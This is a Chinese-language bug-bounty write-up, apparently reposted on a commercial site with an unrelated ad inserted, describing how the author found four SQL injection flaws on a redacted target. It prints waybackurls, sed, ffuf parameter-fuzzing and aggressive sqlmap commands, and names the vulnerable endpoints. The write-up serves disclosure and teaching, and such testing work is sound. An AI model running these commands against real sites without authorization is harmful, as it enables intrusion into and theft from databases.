如何在几分钟内找到多个SQL注入漏洞

今天来分享一下我是如何用几分钟发现某个漏洞赏金的目标多个 SQL 注入漏洞的，接下来以目标域名 redacted.org 为例。

成都创新互联公司专注为客户提供全方位的互联网综合服务，包含不限于网站制作、成都做网站、濂溪网络推广、小程序定制开发、濂溪网络营销、濂溪企业策划、濂溪品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等，从售前售中售后，我们都将竭诚为您服务，您的肯定，是我们最大的嘉奖；成都创新互联公司为所有大学生创业者提供濂溪建站搭建服务，24小时服务热线：13518219792，官方网址：www.cdcxhl.com

枚举阶段

首先我使用 waybackurls 工具查看目标网站上有哪些 URL，然后看到了很多 PHP 的文件，也许可以在其中找到 SQL 注入漏洞，使用命令过滤一些结果之后输出到文件：

waybackurls https://redacted.org/ | uro | grep “.php” > php-files.txt

查看输出的文件，发现了如图中的内容：

看文件名感觉似乎有戏，接下来需要找一些可用的参数，需要制作一个参数名字典然后暴力破解这些页面，搞起！

获取参数

我们基于之前输出的内容，将文件名和参数分离出来，然后去重：

cat php-files.txt| grep -i get | sed 's/.*.get//' | sort -u

接下来删除 php 后缀，得到一个以文件名为关键词的列表，只需在上一条命令后加上 cut -f1 -d 即可：

结果中有的有两个单词或者多个单词的组合，但是我不知道其中那个单词是参数，所以就想办法将其拆分，经过一顿搜索，发现可以用命令：

sed 's/[AZ]+/\n&/g'

我认为参数一般都是小写，所以需要将所有大写字符转换为小写，且保留之前的内容：

接下来我们有了两个参数字典可用，然后使用工具 FFUF 来进行测试，先尝试用全是小写字符的字典：

ffuf -w lowercase-parameters.txt -u "https://redacted.org/searchProgressCommitment.php?FUZZ=5"

但是没有任何结果！

老实说，我很郁闷，但是突然想到一个方案，把请求的方法改成 POST 怎么样?命令如下：

ffuf -w lowercase-parameters.txt -X POST -d "FUZZ=5" -u "https://redacted.org/searchProgressCommitment.php"

结果得到了 commitment & id 参数。

接下来我可以对这些参数进行测试了，复制请求的数据包内容到文件中，丢给 sqlmap 去测。

漏洞利用

sqlmap 的命令如下：

sqlmap -r req3.txt -p commitment --force-ssl --level 5 --risk 3 --dbms=”MYSQL” --hostname --current-user --current-db --dbs --tamper=between --no-cast

漏洞测试成功，确实存在 SQL 注入漏洞；

接下来使用同样的方法，测试其他 URL ，结果我找到了三个同样存在 SQL 注入漏洞的地方。

第二个 SQLI：带有 id 参数的 ws_delComment.php。

第三个 SQLI：带有 target 参数的 getTargets.php。

第四个：mailing_lists.php 带 list 参数。

一共发现四个 SQL 注入，太棒了！

我向安全团队报告了所有 SQL 注入漏洞并审核通过，他们在积极解决问题，感谢大家的阅读。

网站栏目：如何在几分钟内找到多个SQL注入漏洞
标题网址：http://www.shufengxianlan.com/qtweb/news36/64786.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联